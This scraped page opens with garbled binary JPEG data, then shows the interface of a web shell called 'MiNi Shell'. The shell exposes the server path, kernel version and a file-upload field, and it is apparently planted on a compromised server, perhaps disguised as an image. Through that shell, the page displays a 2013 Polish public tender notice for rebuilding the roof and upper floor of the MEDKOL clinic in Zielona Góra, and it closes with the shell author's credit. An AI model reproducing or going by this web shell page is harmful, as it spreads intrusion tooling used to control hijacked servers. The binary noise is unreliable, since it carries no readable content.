JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130725/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130725/294606-N-2013.html

<p class="kh_header"><b>Zielona Góra: Modernizacja budynku Przychodni Samodzielnego Publicznego Zakładu Opieki Zdrowotnej MEDKOL w Zielonej Górze, etap III - podniesienie ścian budynku o dodatkową kondygnację wraz z wymianą dachu</b><br>
<b>Numer ogłoszenia: 294606 - 2013; data zamieszczenia: 25.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej MEDKOL , pl. Kolejarza 1, 65-020 Zielona Góra, woj. lubuskie, tel. 068 4521558, faks 068 4521558.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.medkol.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja budynku Przychodni Samodzielnego Publicznego Zakładu Opieki Zdrowotnej MEDKOL w Zielonej Górze, etap III - podniesienie ścian budynku o dodatkową kondygnację wraz z wymianą dachu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem inwestycji jest rozebranie i wykonanie na nowo konstrukcji dachowej wraz z pokryciem oraz adaptacja poddasza na gabinety lekarskie obiektu kubaturowego położonego na działce nr 271 w Zielonej Górze. Budynek został wybudowany na początku XX wieku i ujęty jest w ewidencji zabytków. Roboty będą głównie polegały na rozbiórce konstrukcji dachu wraz z pokryciem i opierzeniami, podniesieniem ścian do uzyskania wys. poddasza 3,15 m i wykonaniem nowego stropu nad poddaszem wraz z konstrukcją dachu oraz robotami towarzyszącymi.

Modernizowany  budynek jest obiektem piętrowym, podpiwniczonym z poddaszem użytkowym i dachem spadzistym krytym blachą. Powierzchnia modernizowanego poddasza będzie wynosić 209,12 m2  z przeznaczeniem na:
1. poradnia  medycyny  pracy (2 gabinety),
2. poradnia  chorób  płuc (gabinet pulmunologiczny i pokój  badań spirometrycznych),
3. poradnia  dermatologiczna z gabinetem  zabiegowym,
4. wc  personelu (kobiet + mężczyzn),
5.poczekalnie,
6.zespół pomieszczeń  administracji (5 pokoi biurowych dla 6 osób) z aneksem śniadaniowym,
7. komunikacja  z  dźwigiem  osobowym + kl. schodowa

Na przeprowadzenie modernizacji obiektu we wskazanym niżej zakresie Zamawiający posiada pozwolenie na budowę  296/06 z dnia 22.05.2007r. wydanego przez Prezydenta miasta Zielonej Góry. 

Kubatura budynku przed modernizacją wynosi 4360,00 m3, a powierzchnia użytkowa 751,10 m2.
W latach 2007 - 2008 zmodernizowana została piwnica ( z wyjątkiem kotłowni), w której zlokalizowano całe wymagane zaplecze techniczne, magazynowe i socjalne.
W latach 2010 -2011 rok zbudowano wymagany przepisami szyb windowy wraz z instalacją, oraz podjazdem dla niepełnosprawnych.  Winda jest wzniesiona zgodnie z projektem do wysokości zgodnej 
z przyszłą nadbudową poddasza w części poddasz zlokalizowana jest nowa maszynownia do obsługi windy.
W roku 2012 zmodernizowano sanitariat dla potrzeb niepełnosprawnych na parterze

Na planowaną inwestycję składają się:

Roboty budowlane, które obejmują:
1.Roboty rozbiórkowe
2.Roboty murowe
3.Wykonanie konstrukcji z betonu zbrojonego
4.Wykonanie wentylacji grawitacyjnej
5.Wykonanie konstrukcji dachu
6.Wykonanie pokrycia dachu dachówką bitumiczną
7.Wykonanie ścianek działowych z płyt GK
8.Montaż sufitów podwieszanych
9.Montaż stolarki drzwiowej i okiennej
10.Tynkowanie ścian
11.Roboty malarskie
12.Licowanie ścian płytkami ceramicznymi
13.Pokrywanie podłóg płytkami ceramicznymi oraz wykładziną PCV
14.Docieplenie wraz z wyprawą tynkarską dobudowanych ścian

Roboty elektryczne, które obejmują:
1.Montaż tablic i WLZ
2.Wykonanie instalacji oświetlenia podstawowego oraz ewakuacyjnego
3.Wykonanie instalacji gniazd wtyczkowych
4.Wykonanie instalacji sieci logicznej
5.Wykonanie instalacji p. poż, alarmowej, monitoringu
6.Wykonanie instalacji wyrównawczej.

Roboty sanitarne, które obejmują:
1.Wykonanie instalacji centralnego ogrzewania
2.Wykonanie klimatyzacji mechanicznej
3.Wykonanie instalacji wodno - kanalizacyjnej

Wszystkie roboty budowlane prowadzone będą częściowo w czynnym obiekcie i w pomieszczeniach użytkowanych w trakcie wykonywania robót budowlanych. Prowadzenie robót powinno odbywać się w sposób niezakłócający pracy pracowników i użytkowników przychodni 
tj. pacjentów. Wykonawca może, jeśli uzna to za konieczne dla dotrzymania terminów zakończenia robót, realizować roboty budowlane od poniedziałku do piątku w trybie wydłużonego dnia pracy, od godziny 7, jednak nie dłużej niż do godziny 18.Ewentualne soboty lub wydłużony czas pracy ponad w/w godziny ustalany będzie indywidualnie z Wykonawcą.
Zamawiający wymaga, aby na roboty objęte niniejszym postępowaniem, Wykonawca udzielił 60 miesięcznego okresu gwarancji. W tym okresie Wykonawca zobowiązany jest do bezpłatnego usuwania ujawnionych wad..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.26.25.00-6, 45.22.35.00-1, 45.33.12.10-1, 45.26.11.00-5, 45.26.12.10-9, 45.21.11.52-4, 45.42.10.00-4, 45.41.00.00-4, 45.30.00.00-0, 45.44.21.00-8, 45.43.00.00-4, 45.31.00.00-3, 45.31.20.00-7, 45.33.11.00-7, 45.33.12.20-4, 45.33.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości 27 000,00 zł (słownie: dwadzieścia siedem tysięcy 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy, którzy posiadają wiedzę i doświadczenie w realizacji w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:
- co najmniej dwóch robót budowlanych, zakresem odpowiadających przedmiotowi zamówienia tj. roboty budowlane polegające na budowie, remoncie, rozbudowie, nadbudowie, przebudowie  obiektu kubaturowego na kwotę min. 1 000 000,00 zł brutto każda. 
Zakres każdej z wykazanej przez Wykonawcę robót winien obejmować min. roboty dekarskie. Prace dekarskie winny obejmować wymianę/wykonanie nowego pokrycia dachu o powierzchni min. 300 m2 . 
Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże się robotami budowlanymi zakończonymi przed upływem terminu składania ofert.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy, którzy dysponują:	
1. Kierownikiem budowy branży konstrukcyjno-budowlanej - zobowiązany jest posiadać odpowiednie uprawnienia budowlane do kierowania robotami w specjalności konstrukcyjno-budowlanej oraz co najmniej 5-letnie doświadczenie w pełnieniu samodzielnych funkcji w budownictwie - kierowaniu budową, na co najmniej 5 budowach,

2. Kierownikiem robót branży instalacyjnej - zobowiązany jest posiadać odpowiednie uprawnienia budowlane  do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych oraz co najmniej 3-letnie doświadczenie w pełnieniu samodzielnych funkcji w budownictwie, na co najmniej 3 budowach,

3. Kierownikiem robót branży elektrycznej - zobowiązany jest posiadać odpowiednie uprawnienia budowlane do kierowania robotami w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych i elektroenergetycznych oraz co najmniej 3-letnie doświadczenie 
w pełnieniu samodzielnych funkcji w budownictwie, na co najmniej 3 budowach.

Uwaga: np. 3 - letnie doświadczenie Zamawiający rozumie okres czasu liczony od daty uzyskania uprawnień zawodowych do daty wszczęcia niniejszego postępowania.

Uwaga: Pod pojęciem pełnienia funkcji Zamawiający rozumie wykonanie lub wykonywanie    (obecnie) danej funkcji.

4.Wykażą się, iż średnie roczne zatrudnienie wynosiło co najmniej 10 pracowników (bez personelu kierowniczego) oraz co najmniej 3 pracowników w charakterze personelu kierowniczego</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy, którzy udokumentują posiadanie środków finansowych lub zdolność kredytową na kwotę nie mniejszą niż  500 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony i podpisany Formularz ofertowy - zgodnie z zał. nr 1 do SIWZ.
2.  Pisemne zobowiązanie, o którym mowa w rozdziale IX pkt 4 SIWZ, o ile Wykonawca polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp - jeśli dotyczy.
3.Pełnomocnictwo - jeśli dotyczy.
4. Oświadczenie w trybie art. 24 ust. 2 pkt. 5 - zgodnie z zał. nr 4 do SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zastrzega sobie prawo wprowadzenia zmian do zawartej umowy z wybranym Wykonawcą w niniejszym postępowaniu, w przypadku wystąpienia niżej podanych okoliczności:
1.	Zmiany wynagrodzenia Wykonawcy w przypadku ustawowej zmiany wysokości stawki podatku VAT. 
2.	Odstąpienie od umowy lub jej rozwiązanie może nastąpić tylko i wyłącznie w formie pisemnej wraz ze szczegółowym uzasadnieniem i staje się skuteczne z chwilą jego doręczenia.
3.	W przypadku konieczności przesunięcia terminów umownych, jeśli konieczność ta, nastąpiła na skutek okoliczności, których nie można było przewidzieć w chwili zawierania niniejszej umowy tj.:
a.	Niekorzystnych warunków atmosferycznych uniemożliwiających wykonanie robót zewnętrznych. Wówczas maksymalny termin zakończenia robót zostanie przedłużony 
o łączną długość przerw wynikających z przestoju. W tym przypadku wymagane będzie:
- spisanie odpowiedniego protokołu Wykonawcy z inspektorem nadzoru wskutek wstrzymania robót do czasu przystąpienia przez Wykonawcę do kontynuacji robót.

W przypadku zagrożenia opóźnieniem w wykonywaniu prac ze strony Wykonawcy Zamawiający może zażądać od Wykonawcy zwiększenia potencjału, przyspieszenia rytmu prac oraz wydłużenia czasu pracy.

b.	W przypadku konieczności wprowadzenia zmian projektowych, niemających wpływu na cenę. Wówczas termin zakończenia robót zostanie przedłużony o czas niezbędny do wykonania tychże robót będących następstwem naniesionych zmian.
c.	Z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego.
d.	Z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron.
e.	Z powodu okoliczności siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, 
w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grążącego powstaniem szkody w znacznych rozmiarach. 
f.	Wykonawca nie będzie uprawniony do żądania przedłużenia terminu wykonania umowy jeżeli zmiana jest wymuszona uchybieniem czy naruszeniem umowy przez Wykonawcę; w takim przypadku koszty dodatkowe związane z takimi zmianami ponosi Wykonawca.
O wystąpieniu okoliczności mogących wpłynąć na zmianę terminów Wykonawca winien jest poinformować Zamawiającego pisemnie i natychmiast odnotować to w dzienniku budowy.
4. 	W sytuacji zamiany materiału budowlanego lub technologii, zakres robót, przy którym to uczyniono, może zostać (w zależności od decyzji Zamawiającego) wyłączony spod wynagrodzenia ryczałtowego i rozliczony zostanie po dokonaniu obmiaru, kosztorysem powykonawczym. 
5. 	W przypadku zmiany kadry kierowniczej po stronie Wykonawcy przewidzianej do realizacji zamówienia. Wówczas Wykonawca zobowiązany jest zastąpić te osoby osobami posiadającymi te same uprawnienia i doświadczenie, jakie Zamawiający opisał w rozdziale XII ust. 1 lit. c) SIWZ.
7.	W przypadku zmiany terminów płatności faktur i rozliczania przedmiotu umowy 
w przypadku, gdyby zakres robót budowlanych do wykonania przez Wykonawcę był wykonywany 
w inny sposób, niż wynikałoby to z harmonogramu rzeczowo - finansowego.
8.  Szczegółowe zmiany do umowy określa § 10 i § 22 projektu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.medkol.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielney Publiczny Zakład Opieki Zdrowotnej MEDKOL,
 Plac Kolejarza 1, 65-020 Zielona Góra.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.08.2013 godzina 09:00, miejsce: pokój administracji nr 6 Samodzielnego Publicznego Zakładu Opieki Zdrowotnej MEDKOL, Plac Kolejarza 1, 65-020 Zielona Góra.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Termin zakończenia robót: do 6-ciu  miesięcy  od daty przekazania placu budowy z zastrzeżeniem, iż roboty w zakres, których wchodzi zadaszenie ostatniej kondygnacji wraz z wbudowaniem stolarki okiennej (stan surowy zamknięty) należy zakończyć w nieprzekraczalnym terminie do 30.11.2013r. 
tj. do czasu wystąpienia niesprzyjających warunków atmosferycznych, aby można było realizować roboty wewnątrz  budynku i zabezpieczyć budowę przed zalaniem w wyniku opadów atmosferycznych: deszczu, śniegu itp..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com